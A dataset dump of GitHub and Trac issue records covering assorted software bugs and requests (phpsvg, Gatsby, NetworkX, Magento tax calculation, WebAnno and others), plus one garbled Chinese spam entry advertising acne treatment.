�疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的痘�
��。
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 7:53
|
defect
|
深圳粉刺如何祛除 深圳粉刺如何祛除【 , 】深圳韩方科颜专业祛痘连锁机构,机构以韩国秘�� �——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩方� ��颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹”健 康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专业�� �疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的痘� ��。 original issue reported on code google com by szft com on may at
| 1
|
14,420
| 2,811,773,298
|
IssuesEvent
|
2015-05-18 01:05:45
|
itsazzad/phpsvg
|
https://api.github.com/repos/itsazzad/phpsvg
|
reopened
|
Wrong tmp file name while export to EPS
|
auto-migrated Priority-Medium Type-Defect
|
```
1. Create $svg from existing SVG file
2. Try to export it to EPS under non-root user (apache, for reference)
Expected: eps file
Instead: PHP Warning: file_put_contents(/tmptmp.svg): failed to open stream:
Permission denied in /var/www/projects/mpakki/test/public/svglib/svglib.php on
line 188
I tried version 0.8 on CentOS 6.4 and php 5.4
```
Original issue reported on code.google.com by `mpa...@gmail.com` on 11 Dec 2014 at 5:55
|
1.0
|
Wrong tmp file name while export to EPS - ```
1. Create $svg from existing SVG file
2. Try to export it to EPS under non-root user (apache, for reference)
Expected: eps file
Instead: PHP Warning: file_put_contents(/tmptmp.svg): failed to open stream:
Permission denied in /var/www/projects/mpakki/test/public/svglib/svglib.php on
line 188
I tried version 0.8 on CentOS 6.4 and php 5.4
```
Original issue reported on code.google.com by `mpa...@gmail.com` on 11 Dec 2014 at 5:55
|
defect
|
wrong tmp file name while export to eps create svg from existing svg file try to export it to eps under non root user apache for reference expected eps file instead php warning file put contents tmptmp svg failed to open stream permission denied in var www projects mpakki test public svglib svglib php on line i tried version on centos and php original issue reported on code google com by mpa gmail com on dec at
| 1
|
202,354
| 15,827,651,445
|
IssuesEvent
|
2021-04-06 08:57:06
|
gatsbyjs/gatsby
|
https://api.github.com/repos/gatsbyjs/gatsby
|
closed
|
Fix code snippets on GraphQL Query Options Reference page
|
type: documentation
|
<!--
To make it easier for us to help you, please include as much useful information as possible.
Useful Links:
- Documentation: https://www.gatsbyjs.com/docs/
- Contributing: https://www.gatsbyjs.com/contributing/
Before opening a new issue, please search existing issues https://github.com/gatsbyjs/gatsby/issues
-->
## Summary
All code snippets on the [GraphQL Query Options Reference page](https://www.gatsbyjs.com/docs/graphql-reference/) fail to load with the error:
```
failed to get pod ip for sitehostname: graphql-reference-1124782374.gtsb.io nil
```

### Motivation
This should be fixed because graphql queries are pretty central to Gatsby sites and example code can be invaluable to those trying to learn what they need to, or can do.
## Steps to resolve this issue
<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
It's hard to pin point exactly what's needed to resolve the issue, but as a start point I'd suggest looking at updating the iframe src links in https://github.com/gatsbyjs/gatsby/blob/master/docs/docs/graphql-reference.md
|
1.0
|
Fix code snippets on GraphQL Query Options Reference page - <!--
To make it easier for us to help you, please include as much useful information as possible.
Useful Links:
- Documentation: https://www.gatsbyjs.com/docs/
- Contributing: https://www.gatsbyjs.com/contributing/
Before opening a new issue, please search existing issues https://github.com/gatsbyjs/gatsby/issues
-->
## Summary
All code snippets on the [GraphQL Query Options Reference page](https://www.gatsbyjs.com/docs/graphql-reference/) fail to load with the error:
```
failed to get pod ip for sitehostname: graphql-reference-1124782374.gtsb.io nil
```

### Motivation
This should be fixed because graphql queries are pretty central to Gatsby sites and example code can be invaluable to those trying to learn what they need to, or can do.
## Steps to resolve this issue
<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
It's hard to pin point exactly what's needed to resolve the issue, but as a start point I'd suggest looking at updating the iframe src links in https://github.com/gatsbyjs/gatsby/blob/master/docs/docs/graphql-reference.md
|
non_defect
|
fix code snippets on graphql query options reference page to make it easier for us to help you please include as much useful information as possible useful links documentation contributing before opening a new issue please search existing issues summary all code snippets on the fail to load with the error failed to get pod ip for sitehostname graphql reference gtsb io nil motivation this should be fixed because graphql queries are pretty central to gatsby sites and example code can be invaluable to those trying to learn what they need to or can do steps to resolve this issue it s hard to pin point exactly what s needed to resolve the issue but as a start point i d suggest looking at updating the iframe src links in
| 0
|
61,522
| 17,023,714,470
|
IssuesEvent
|
2021-07-03 03:27:08
|
tomhughes/trac-tickets
|
https://api.github.com/repos/tomhughes/trac-tickets
|
closed
|
Germany: several cities are assigned to the wrong district (e.g. "Heimsheim" is not in "Landkreis Esslingen")
|
Component: nominatim Priority: trivial Resolution: invalid Type: defect
|
**[Submitted to the original trac issue database at 8.31pm, Thursday, 26th May 2011]**
On the OSM main search field, enter "Heimsheim" (a city in Germany). The result is:
"Verwaltungsgrenze Heimsheim, Landkreis Esslingen, Regierungsbezirk Karlsruhe, Baden-Wrttemberg, 71296, Deutschland"
This is wrong, Heimsheim is located in the "Enzkreis", not the "Landkreis Esslingen" (cf. Wikipedia).
|
1.0
|
Germany: several cities are assigned to the wrong district (e.g. "Heimsheim" is not in "Landkreis Esslingen") - **[Submitted to the original trac issue database at 8.31pm, Thursday, 26th May 2011]**
On the OSM main search field, enter "Heimsheim" (a city in Germany). The result is:
"Verwaltungsgrenze Heimsheim, Landkreis Esslingen, Regierungsbezirk Karlsruhe, Baden-Wrttemberg, 71296, Deutschland"
This is wrong, Heimsheim is located in the "Enzkreis", not the "Landkreis Esslingen" (cf. Wikipedia).
|
defect
|
germany several cities are assigned to the wrong district e g heimsheim is not in landkreis esslingen on the osm main search field enter heimsheim a city in germany the result is verwaltungsgrenze heimsheim landkreis esslingen regierungsbezirk karlsruhe baden wrttemberg deutschland this is wrong heimsheim is located in the enzkreis not the landkreis esslingen cf wikipedia
| 1
|
37,666
| 8,474,785,542
|
IssuesEvent
|
2018-10-24 17:05:22
|
brainvisa/testbidon
|
https://api.github.com/repos/brainvisa/testbidon
|
closed
|
NIfTI-1 reader does not apply scaling parametres
|
Component: Resolution Priority: Haut Status: Closed Tracker: Defect
|
---
Author Name: **Leprince, Yann** (Leprince, Yann)
Original Redmine Issue: 10918, https://bioproj.extra.cea.fr/redmine/issues/10918
Original Date: 2014-08-29
---
When reading a NIfTI-1 file, the reader does not scale the data (slope/intercept). This changes the behaviour compared with the previous AIMS reader (scale_factor_applied = 0). As a result, the values loaded in AIMS (and thus Anatomist) do not match the values used when saving the file, leading to data corruption.
|
1.0
|
NIfTI-1 reader does not apply scaling parametres - ---
Author Name: **Leprince, Yann** (Leprince, Yann)
Original Redmine Issue: 10918, https://bioproj.extra.cea.fr/redmine/issues/10918
Original Date: 2014-08-29
---
When reading a NIfTI-1 file, the reader does not scale the data (slope/intercept). This changes the behaviour compared with the previous AIMS reader (scale_factor_applied = 0). As a result, the values loaded in AIMS (and thus Anatomist) do not match the values used when saving the file, leading to data corruption.
|
defect
|
nifti reader does not apply scaling parametres author name leprince yann leprince yann original redmine issue original date when reading a nifti file the reader does not scale the data slope intercept this changes the behaviour compared with the previous aims reader scale factor applied as a result the values loaded in aims and thus anatomist do not match the values used when saving the file leading to data corruption
| 1
|
383,712
| 26,562,259,360
|
IssuesEvent
|
2023-01-20 16:49:33
|
inveniosoftware/invenio
|
https://api.github.com/repos/inveniosoftware/invenio
|
closed
|
Add doc about `Modelling data`
|
Need: documentation
|
Add documentation about modelling data:
* JSONSchema
* JSONResolver
* linking between records
|
1.0
|
Add doc about `Modelling data` - Add documentation about modelling data:
* JSONSchema
* JSONResolver
* linking between records
|
non_defect
|
add doc about modelling data add documentation about modelling data jsonschema jsonresolver linking between records
| 0
|
24,157
| 12,036,253,910
|
IssuesEvent
|
2020-04-13 19:26:22
|
badges/shields
|
https://api.github.com/repos/badges/shields
|
opened
|
Crowdin badges
|
service-badge
|
:clipboard: **Description**
It would be a nice addition, to have Crowdin's "Localized" badge (https://badges.crowdin.net/:project/localized.svg) with the customisation options of Shields.io
:link: **Data**
There are two APIs available. The current v1 AP and the v2 API (Beta)
Docs v1: https://support.crowdin.com/api/api-integration-setup/
Docs v2: https://support.crowdin.com/api/v2/#section/Introduction
v1 requires an API key (Generated with the project) and v2 a PAT (Personal Access Token)
:microphone: **Motivation**
Crowdin already offers a badge to display (See first link) but this badge is only limited to the overall translation of all languages and can't be customised in design nor f.e. to have it cover a specific language only.
|
1.0
|
Crowdin badges - :clipboard: **Description**
It would be a nice addition, to have Crowdin's "Localized" badge (https://badges.crowdin.net/:project/localized.svg) with the customisation options of Shields.io
:link: **Data**
There are two APIs available. The current v1 AP and the v2 API (Beta)
Docs v1: https://support.crowdin.com/api/api-integration-setup/
Docs v2: https://support.crowdin.com/api/v2/#section/Introduction
v1 requires an API key (Generated with the project) and v2 a PAT (Personal Access Token)
:microphone: **Motivation**
Crowdin already offers a badge to display (See first link) but this badge is only limited to the overall translation of all languages and can't be customised in design nor f.e. to have it cover a specific language only.
|
non_defect
|
crowdin badges clipboard description it would be a nice addition to have crowdin s localized badge with the customisation options of shields io link data there are two apis available the current ap and the api beta docs docs requires an api key generated with the project and a pat personal access token microphone motivation crowdin already offers a badge to display see first link but this badge is only limited to the overall translation of all languages and can t be customised in design nor f e to have it cover a specific language only
| 0
|
361,486
| 25,341,725,694
|
IssuesEvent
|
2022-11-18 22:26:10
|
ERSP-2022-projects/ersp22-vigoda
|
https://api.github.com/repos/ERSP-2022-projects/ersp22-vigoda
|
closed
|
Upload relevant research papers
|
documentation
|
Upload relevant research papers to README or create another folder
|
1.0
|
Upload relevant research papers - Upload relevant research papers to README or create another folder
|
non_defect
|
upload relevant research papers upload relevant research papers to readme or create another folder
| 0
|
37,801
| 8,519,587,696
|
IssuesEvent
|
2018-11-01 15:04:45
|
GoldenSoftwareLtd/gedemin
|
https://api.github.com/repos/GoldenSoftwareLtd/gedemin
|
closed
|
После активации настроек информационное окно всегда прячется под все формы
|
GedeminExe Priority-Critical Type-Defect
|
Originally reported on Google Code with ID 3406
```
После установки настроек (не ПИ) информационное окно ВСЕГДА прячется под все формы.
Полностью блокирует выполнение дальнейших действий. Сейчас приходится закрывать каждую
форму отдельно. Такого не должно быть. РАНЬШЕ ТАКОГО НЕ БЫЛО.
```
Reported by `NikolayUkleyko` on 2014-06-20 15:00:04
|
1.0
|
После активации настроек информационное окно всегда прячется под все формы - Originally reported on Google Code with ID 3406
```
После установки настроек (не ПИ) информационное окно ВСЕГДА прячется под все формы.
Полностью блокирует выполнение дальнейших действий. Сейчас приходится закрывать каждую
форму отдельно. Такого не должно быть. РАНЬШЕ ТАКОГО НЕ БЫЛО.
```
Reported by `NikolayUkleyko` on 2014-06-20 15:00:04
|
defect
|
после активации настроек информационное окно всегда прячется под все формы originally reported on google code with id после установки настроек не пи информационное окно всегда прячется под все формы полностью блокирует выполнение дальнейших действий сейчас приходится закрывать каждую форму отдельно такого не должно быть раньше такого не было reported by nikolayukleyko on
| 1
|
81,135
| 30,723,787,635
|
IssuesEvent
|
2023-07-27 17:56:18
|
SeleniumHQ/selenium
|
https://api.github.com/repos/SeleniumHQ/selenium
|
closed
|
[🐛 Bug]: In python trying to login on youtube: This browser or app may not be secure
|
I-defect I-question needs-triaging
|
### What happened?
I have tried, chrome, firefox, geckodriver_autoinstaller, undetected_chromedriver and every time when the email adress is filled in on youtube.com I get the message:This browser or app may not be secure
Is this normal? is this a bug? or just youtube.com not supported?
python 3.8
selenium 4.10.0
### How can we reproduce the issue?
```shell
from selenium import webdriver
import geckodriver_autoinstaller
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
import os
import time
geckodriver_autoinstaller.install()
driver = webdriver.Firefox()
# YouTube login credentials
username = os.environ["YOUTUBE_EMAIL"]
password = os.environ["YOUTUBE_PASSWORD"]
# Open YouTube
driver.get('https://www.youtube.com/signin')
# Click on the Sign In button
#driver.find_element(By.XPATH, '//ytd-button-renderer/a/tp-yt-paper-button').click()
# Enter login credentials and submit
driver.find_element(By.ID, 'identifierId').send_keys(username)
driver.find_element(By.ID,'identifierNext').click()
time.sleep(2)
driver.find_element(By.NAME, 'password').send_keys(password)
driver.find_element(By.ID,'passwordNext').click()
```
### Relevant log output
```shell
not relevant.
```
### Operating System
mac os ventura 13.1
### Selenium version
4.1
### What are the browser(s) and version(s) where you see this issue?
chrome 115.0.5790.114, firefox 115.0.5790.114
### What are the browser driver(s) and version(s) where you see this issue?
115.
### Are you using Selenium Grid?
_No response_
|
1.0
|
[🐛 Bug]: In python trying to login on youtube: This browser or app may not be secure - ### What happened?
I have tried, chrome, firefox, geckodriver_autoinstaller, undetected_chromedriver and every time when the email adress is filled in on youtube.com I get the message:This browser or app may not be secure
Is this normal? is this a bug? or just youtube.com not supported?
python 3.8
selenium 4.10.0
### How can we reproduce the issue?
```shell
from selenium import webdriver
import geckodriver_autoinstaller
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
import os
import time
geckodriver_autoinstaller.install()
driver = webdriver.Firefox()
# YouTube login credentials
username = os.environ["YOUTUBE_EMAIL"]
password = os.environ["YOUTUBE_PASSWORD"]
# Open YouTube
driver.get('https://www.youtube.com/signin')
# Click on the Sign In button
#driver.find_element(By.XPATH, '//ytd-button-renderer/a/tp-yt-paper-button').click()
# Enter login credentials and submit
driver.find_element(By.ID, 'identifierId').send_keys(username)
driver.find_element(By.ID,'identifierNext').click()
time.sleep(2)
driver.find_element(By.NAME, 'password').send_keys(password)
driver.find_element(By.ID,'passwordNext').click()
```
### Relevant log output
```shell
not relevant.
```
### Operating System
mac os ventura 13.1
### Selenium version
4.1
### What are the browser(s) and version(s) where you see this issue?
chrome 115.0.5790.114, firefox 115.0.5790.114
### What are the browser driver(s) and version(s) where you see this issue?
115.
### Are you using Selenium Grid?
_No response_
|
defect
|
in python trying to login on youtube this browser or app may not be secure what happened i have tried chrome firefox geckodriver autoinstaller undetected chromedriver and every time when the email adress is filled in on youtube com i get the message this browser or app may not be secure is this normal is this a bug or just youtube com not supported python selenium how can we reproduce the issue shell from selenium import webdriver import geckodriver autoinstaller from selenium webdriver common desired capabilities import desiredcapabilities from selenium webdriver common by import by import os import time geckodriver autoinstaller install driver webdriver firefox youtube login credentials username os environ password os environ open youtube driver get click on the sign in button driver find element by xpath ytd button renderer a tp yt paper button click enter login credentials and submit driver find element by id identifierid send keys username driver find element by id identifiernext click time sleep driver find element by name password send keys password driver find element by id passwordnext click relevant log output shell not relevant operating system mac os ventura selenium version what are the browser s and version s where you see this issue chrome firefox what are the browser driver s and version s where you see this issue are you using selenium grid no response
| 1
|
523,418
| 15,181,544,418
|
IssuesEvent
|
2021-02-15 03:55:18
|
AyeCode/invoicing
|
https://api.github.com/repos/AyeCode/invoicing
|
closed
|
Add webhook script running on every page load.
|
For: Developer Priority: Critical Type: Bug
|
- Check if it fails, set a flag, ask for more permission (needs reconnect?)
- Can we currently read webhooks with current permissions? if so add a admin notice stating its missing.
- if so show a X or a tick next to the webhook setting
|
1.0
|
Add webhook script running on every page load. - - Check if it fails, set a flag, ask for more permission (needs reconnect?)
- Can we currently read webhooks with current permissions? if so add a admin notice stating its missing.
- if so show a X or a tick next to the webhook setting
|
non_defect
|
add webhook script running on every page load check if it fails set a flag ask for more permission needs reconnect can we currently read webhooks with current permissions if so add a admin notice stating its missing if so show a x or a tick next to the webhook setting
| 0
|
257,630
| 19,526,165,650
|
IssuesEvent
|
2021-12-30 08:13:47
|
dfir-iris/iris-web
|
https://api.github.com/repos/dfir-iris/iris-web
|
closed
|
Add screenshots and link to video in README
|
documentation
|
After many requests, we should add some screenshots + direct links to videos in the readme
|
1.0
|
Add screenshots and link to video in README - After many requests, we should add some screenshots + direct links to videos in the readme
|
non_defect
|
add screenshots and link to video in readme after many requests we should add some screenshots direct links to videos in the readme
| 0
|
71,305
| 23,531,666,003
|
IssuesEvent
|
2022-08-19 15:55:19
|
networkx/networkx
|
https://api.github.com/repos/networkx/networkx
|
reopened
|
treewidth algos depend on node types
|
Defect
|
The treewidth functions appear to depend on the types of nodes in the input graph.
### Current Behavior
For example, the algos fail is there is a mix of nodes with integer and string types.
### Expected Behavior
The algos should not depend on node types, only the graph structure.
### Steps to Reproduce
```python
import networkx as nx
from networkx.algorithms.approximation import treewidth
G = nx.Graph()
G.add_nodes_from([0, 'a'])
tw, td = treewidth.treewidth_min_degree(G)
or
tw, td = treewidth.treewidth_min_fill_in(G)
```
### Environment
Python version: 3.8
NetworkX version: 2.8
### Additional context
Error:
File "<somedir>/lib/python3.8/site-packages/networkx/algorithms/approximation/treewidth.py", line 106, in __init__
heapify(self._degreeq)
TypeError: '<' not supported between instances of 'int' and 'str'
|
1.0
|
treewidth algos depend on node types - The treewidth functions appear to depend on the types of nodes in the input graph.
### Current Behavior
For example, the algos fail is there is a mix of nodes with integer and string types.
### Expected Behavior
The algos should not depend on node types, only the graph structure.
### Steps to Reproduce
```python
import networkx as nx
from networkx.algorithms.approximation import treewidth
G = nx.Graph()
G.add_nodes_from([0, 'a'])
tw, td = treewidth.treewidth_min_degree(G)
or
tw, td = treewidth.treewidth_min_fill_in(G)
```
### Environment
Python version: 3.8
NetworkX version: 2.8
### Additional context
Error:
File "<somedir>/lib/python3.8/site-packages/networkx/algorithms/approximation/treewidth.py", line 106, in __init__
heapify(self._degreeq)
TypeError: '<' not supported between instances of 'int' and 'str'
|
defect
|
treewidth algos depend on node types the treewidth functions appear to depend on the types of nodes in the input graph current behavior for example the algos fail is there is a mix of nodes with integer and string types expected behavior the algos should not depend on node types only the graph structure steps to reproduce python import networkx as nx from networkx algorithms approximation import treewidth g nx graph g add nodes from tw td treewidth treewidth min degree g or tw td treewidth treewidth min fill in g environment python version networkx version additional context error file lib site packages networkx algorithms approximation treewidth py line in init heapify self degreeq typeerror not supported between instances of int and str
| 1
|
26,500
| 4,730,231,829
|
IssuesEvent
|
2016-10-18 20:59:33
|
AsyncHttpClient/async-http-client
|
https://api.github.com/repos/AsyncHttpClient/async-http-client
|
opened
|
Relax the sanity check in HttpClientUpgradeHandler
|
Defect
|
Mirror of https://github.com/netty/netty/issues/4509
Reminder to investigate and try to contribute here
|
1.0
|
Relax the sanity check in HttpClientUpgradeHandler - Mirror of https://github.com/netty/netty/issues/4509
Reminder to investigate and try to contribute here
|
defect
|
relax the sanity check in httpclientupgradehandler mirror of reminder to investigate and try to contribute here
| 1
|
13,163
| 15,590,183,061
|
IssuesEvent
|
2021-03-18 09:02:43
|
CNPMNC-KDH/TKB
|
https://api.github.com/repos/CNPMNC-KDH/TKB
|
reopened
|
Student schedule app
|
DuongThienKhoi NguyenThanhDuy Processing...... VuDuyVietHoang
|
Xây dựng ứng dụng quản lý thời khóa biểu sinh viên giúp người dùng quản lý thời gian học tập tốt hơn.
- [x] Hoàn thành nghiên cứu ứng dụng.
- [ ] Hoàn thành kham khảo giao diện template.
- [ ] Hoàn thành thống nhất chủ đề giao diện.
- [ ] Hoàn thành xây dựng hệ cơ sở dữ liệu.
- [ ] Hoàn thành log in, sign in, forgot.
- [ ] Hoàn thành alarm.
- [ ] Hoàn thành thời khóa biểu.
- [ ] Hoàn thành xây dựng ứng dụng.
- [ ] Chạy thử ứng dụng trên nhiều nền tảng.
- [ ] Kiểm thử và sửa lỗi.
- [ ] Phát hành sản phẩm lên các nền tảng cửa hàng trực tuyến.
|
1.0
|
Student schedule app - Xây dựng ứng dụng quản lý thời khóa biểu sinh viên giúp người dùng quản lý thời gian học tập tốt hơn.
- [x] Hoàn thành nghiên cứu ứng dụng.
- [ ] Hoàn thành kham khảo giao diện template.
- [ ] Hoàn thành thống nhất chủ đề giao diện.
- [ ] Hoàn thành xây dựng hệ cơ sở dữ liệu.
- [ ] Hoàn thành log in, sign in, forgot.
- [ ] Hoàn thành alarm.
- [ ] Hoàn thành thời khóa biểu.
- [ ] Hoàn thành xây dựng ứng dụng.
- [ ] Chạy thử ứng dụng trên nhiều nền tảng.
- [ ] Kiểm thử và sửa lỗi.
- [ ] Phát hành sản phẩm lên các nền tảng cửa hàng trực tuyến.
|
non_defect
|
student schedule app xây dựng ứng dụng quản lý thời khóa biểu sinh viên giúp người dùng quản lý thời gian học tập tốt hơn hoàn thành nghiên cứu ứng dụng hoàn thành kham khảo giao diện template hoàn thành thống nhất chủ đề giao diện hoàn thành xây dựng hệ cơ sở dữ liệu hoàn thành log in sign in forgot hoàn thành alarm hoàn thành thời khóa biểu hoàn thành xây dựng ứng dụng chạy thử ứng dụng trên nhiều nền tảng kiểm thử và sửa lỗi phát hành sản phẩm lên các nền tảng cửa hàng trực tuyến
| 0
|
510,539
| 14,792,540,361
|
IssuesEvent
|
2021-01-12 14:52:23
|
magento/magento2
|
https://api.github.com/repos/magento/magento2
|
closed
|
Wrong tax calculation after applying discount coupon in Magento Open Source v2.3.4
|
CD Component: SalesRule Component: Tax Issue: Confirmed Issue: Format is valid Issue: Ready for Work Priority: P2 Progress: dev in progress Reported on 2.3.4 Reproduced on 2.4.x Severity: S2
|
### Preconditions (*)
1. Fresh Magento 2.3.4, 2.4-develop (Open Source) with sample data
### Steps to reproduce (*)
1. Stores->Configuration-> Sales->Tax : Set all values including tax and Apply Customer Tax After Discount (http://prnt.sc/tyizqn)
2. Stores->Tax Zones and Rates: Set VAT of 15% (http://prnt.sc/tyizuc)
3. Stores->Tax Rules: Set VAT of 15% (http://prnt.sc/tyizwl)
4. Marketing-> Cart Price Rule: Set 10% off on "Percent of product price discount" (http://prnt.sc/tyizzo)
### Expected result (*)
If any taxable item's (https://prnt.sc/tyjm6f) selling price 100 and tax 15% (13.04) included, then:
1. Base price without tax should be (100 - 13.04) = 86.96
2. As 10% Discount from that Base price should be (86.96 * 10%) = 8.70
3. After Discount Base price should be (86.96 - 8.70) = 78.26
4. 15% Tax on New discounted base price (78.26 * 15%) = 11.74
5. So Total price after discount with tax (78.26 + 11.74) = 90
### Actual result (*)
But on Magento after discount, it calculates wrong Tax and total
1. it shows Base price without tax 86.96 which is ok
2. it shows As 10% Discount from that Base price 8.70 which is also ok
3. but the **Tax it shows 11.91 which is wrong**
4. and it shows **total price after discount with tax 91.30 which is also wrong**
http://prnt.sc/tyj01h
**Can anybody explain why it's working this way and what is the logic behind it?**
### Temporary solution
If we follow this fix https://github.com/magento/magento2/issues/21456#issuecomment-467475342
Fix on file `vendor/magento/module-tax/Model/Calculation/AbstractAggregateCalculator.php:49`
Replace:
```
//TODO: handle originalDiscountAmount
$taxableAmount = max($rowTotalInclTax - $discountAmount, 0);
$rowTaxAfterDiscount = $this->calculationTool->calcTaxAmount(
$taxableAmount,
$rate,
true,
false
);
$rowTaxAfterDiscount = $this->roundAmount(
$rowTaxAfterDiscount,
$rate,
true,
self::KEY_REGULAR_DELTA_ROUNDING,
$round,
$item
);
// Set discount tax compensation
$discountTaxCompensationAmount = $rowTax - $rowTaxAfterDiscount;
$rowTax = $rowTaxAfterDiscount;
```
With the following:
```
$taxableAmount = max($rowTotal - $discountAmount, 0);
$discountTaxCompensationAmount = 0;
$rowTax = $taxableAmount * ($rate / 100);
```
In our case, it works as expected (http://prnt.sc/tyj04g). Thanks to @pierzakp
**Is it reliable or safe enough to apply on the production site? Is there any alternative way or settings to fix that tax issue?**
>_Note: After applying this fix it wasn't working as expected, then find out its need clear cache properly both for Magento + Browser + 3rd party (if any)._
|
1.0
|
Wrong tax calculation after applying discount coupon in Magento Open Source v2.3.4 - ### Preconditions (*)
1. Fresh Magento 2.3.4, 2.4-develop (Open Source) with sample data
### Steps to reproduce (*)
1. Stores->Configuration-> Sales->Tax : Set all values including tax and Apply Customer Tax After Discount (http://prnt.sc/tyizqn)
2. Stores->Tax Zones and Rates: Set VAT of 15% (http://prnt.sc/tyizuc)
3. Stores->Tax Rules: Set VAT of 15% (http://prnt.sc/tyizwl)
4. Marketing-> Cart Price Rule: Set 10% off on "Percent of product price discount" (http://prnt.sc/tyizzo)
### Expected result (*)
If any taxable item's (https://prnt.sc/tyjm6f) selling price 100 and tax 15% (13.04) included, then:
1. Base price without tax should be (100 - 13.04) = 86.96
2. As 10% Discount from that Base price should be (86.96 * 10%) = 8.70
3. After Discount Base price should be (86.96 - 8.70) = 78.26
4. 15% Tax on New discounted base price (78.26 * 15%) = 11.74
5. So Total price after discount with tax (78.26 + 11.74) = 90
### Actual result (*)
But on Magento after discount, it calculates wrong Tax and total
1. it shows Base price without tax 86.96 which is ok
2. it shows As 10% Discount from that Base price 8.70 which is also ok
3. but the **Tax it shows 11.91 which is wrong**
4. and it shows **total price after discount with tax 91.30 which is also wrong**
http://prnt.sc/tyj01h
**Can anybody explain why it's working this way and what is the logic behind it?**
### Temporary solution
If we follow this fix https://github.com/magento/magento2/issues/21456#issuecomment-467475342
Fix on file `vendor/magento/module-tax/Model/Calculation/AbstractAggregateCalculator.php:49`
Replace:
```
//TODO: handle originalDiscountAmount
$taxableAmount = max($rowTotalInclTax - $discountAmount, 0);
$rowTaxAfterDiscount = $this->calculationTool->calcTaxAmount(
$taxableAmount,
$rate,
true,
false
);
$rowTaxAfterDiscount = $this->roundAmount(
$rowTaxAfterDiscount,
$rate,
true,
self::KEY_REGULAR_DELTA_ROUNDING,
$round,
$item
);
// Set discount tax compensation
$discountTaxCompensationAmount = $rowTax - $rowTaxAfterDiscount;
$rowTax = $rowTaxAfterDiscount;
```
With the following:
```
$taxableAmount = max($rowTotal - $discountAmount, 0);
$discountTaxCompensationAmount = 0;
$rowTax = $taxableAmount * ($rate / 100);
```
In our case, it works as expected (http://prnt.sc/tyj04g). Thanks to @pierzakp
**Is it reliable or safe enough to apply on the production site? Is there any alternative way or settings to fix that tax issue?**
>_Note: After applying this fix it wasn't working as expected, then find out its need clear cache properly both for Magento + Browser + 3rd party (if any)._
|
non_defect
|
wrong tax calculation after applying discount coupon in magento open source preconditions fresh magento develop open source with sample data steps to reproduce stores configuration sales tax set all values including tax and apply customer tax after discount stores tax zones and rates set vat of stores tax rules set vat of marketing cart price rule set off on percent of product price discount expected result if any taxable item s selling price and tax included then base price without tax should be as discount from that base price should be after discount base price should be tax on new discounted base price so total price after discount with tax actual result but on magento after discount it calculates wrong tax and total it shows base price without tax which is ok it shows as discount from that base price which is also ok but the tax it shows which is wrong and it shows total price after discount with tax which is also wrong can anybody explain why it s working this way and what is the logic behind it temporary solution if we follow this fix fix on file vendor magento module tax model calculation abstractaggregatecalculator php replace todo handle originaldiscountamount taxableamount max rowtotalincltax discountamount rowtaxafterdiscount this calculationtool calctaxamount taxableamount rate true false rowtaxafterdiscount this roundamount rowtaxafterdiscount rate true self key regular delta rounding round item set discount tax compensation discounttaxcompensationamount rowtax rowtaxafterdiscount rowtax rowtaxafterdiscount with the following taxableamount max rowtotal discountamount discounttaxcompensationamount rowtax taxableamount rate in our case it works as expected thanks to pierzakp is it reliable or safe enough to apply on the production site is there any alternative way or settings to fix that tax issue note after applying this fix it wasn t working as expected then find out its need clear cache properly both for magento browser party if any
| 0
|
3,310
| 13,439,947,209
|
IssuesEvent
|
2020-09-07 23:00:16
|
webanno/webanno
|
https://api.github.com/repos/webanno/webanno
|
closed
|
Importing partial Conll-u format for automation
|
Module: Automation Support request 🐛Bug
|
**Describe the bug**
I have a conll-u file with, per line, the token, the lemma, and the pos tag. I'm unable to upload this document for automation. When uploading it prints :
"Error while uploading document DOMcorpuscreole.conllu: NumberFormatException: For input string: "_""
**To Reproduce**
Steps to reproduce the behavior:
1. Go to projects
2. Create an automation project
3. Click on Documents
4. Upload Conll-u document
5. See error
**Expected behavior**
I would like to be able to import a partial conll-u file for automation, since I did POS tagging on one software and plan on doing dependencies on Webanno.
**Screenshots**

The sections per line are tab-separated (it may not look like it on Atom).
**Please complete the following information:**
- Version and build ID: [WebAnno -- 3.6.4 (2019-12-15 11:32:54, build 97e9ce7d289b6b34715e146c9e6a2782b535e43a) ]
- OS: Windows
- Browser: chrome
**Additional context**
Add any other context about the problem here.
|
1.0
|
Importing partial Conll-u format for automation - **Describe the bug**
I have a conll-u file with, per line, the token, the lemma, and the pos tag. I'm unable to upload this document for automation. When uploading it prints :
"Error while uploading document DOMcorpuscreole.conllu: NumberFormatException: For input string: "_""
**To Reproduce**
Steps to reproduce the behavior:
1. Go to projects
2. Create an automation project
3. Click on Documents
4. Upload Conll-u document
5. See error
**Expected behavior**
I would like to be able to import a partial conll-u file for automation, since I did POS tagging on one software and plan on doing dependencies on Webanno.
**Screenshots**

The sections per line are tab-separated (it may not look like it on Atom).
**Please complete the following information:**
- Version and build ID: [WebAnno -- 3.6.4 (2019-12-15 11:32:54, build 97e9ce7d289b6b34715e146c9e6a2782b535e43a) ]
- OS: Windows
- Browser: chrome
**Additional context**
Add any other context about the problem here.
|
non_defect
|
importing partial conll u format for automation describe the bug i have a conll u file with per line the token the lemma and the pos tag i m unable to upload this document for automation when uploading it prints error while uploading document domcorpuscreole conllu numberformatexception for input string to reproduce steps to reproduce the behavior go to projects create an automation project click on documents upload conll u document see error expected behavior i would like to be able to import a partial conll u file for automation since i did pos tagging on one software and plan on doing dependencies on webanno screenshots the sections per line are tab separated it may not look like it on atom please complete the following information version and build id os windows browser chrome additional context add any other context about the problem here
| 0
|
46,826
| 13,055,983,493
|
IssuesEvent
|
2020-07-30 03:18:16
|
icecube-trac/tix2
|
https://api.github.com/repos/icecube-trac/tix2
|
opened
|
offline-software trunk fails to build (Trac #1943)
|
Incomplete Migration Migrated from Trac combo core defect
|
Migrated from https://code.icecube.wisc.edu/ticket/1943
```json
{
"status": "closed",
"changetime": "2017-01-31T17:41:13",
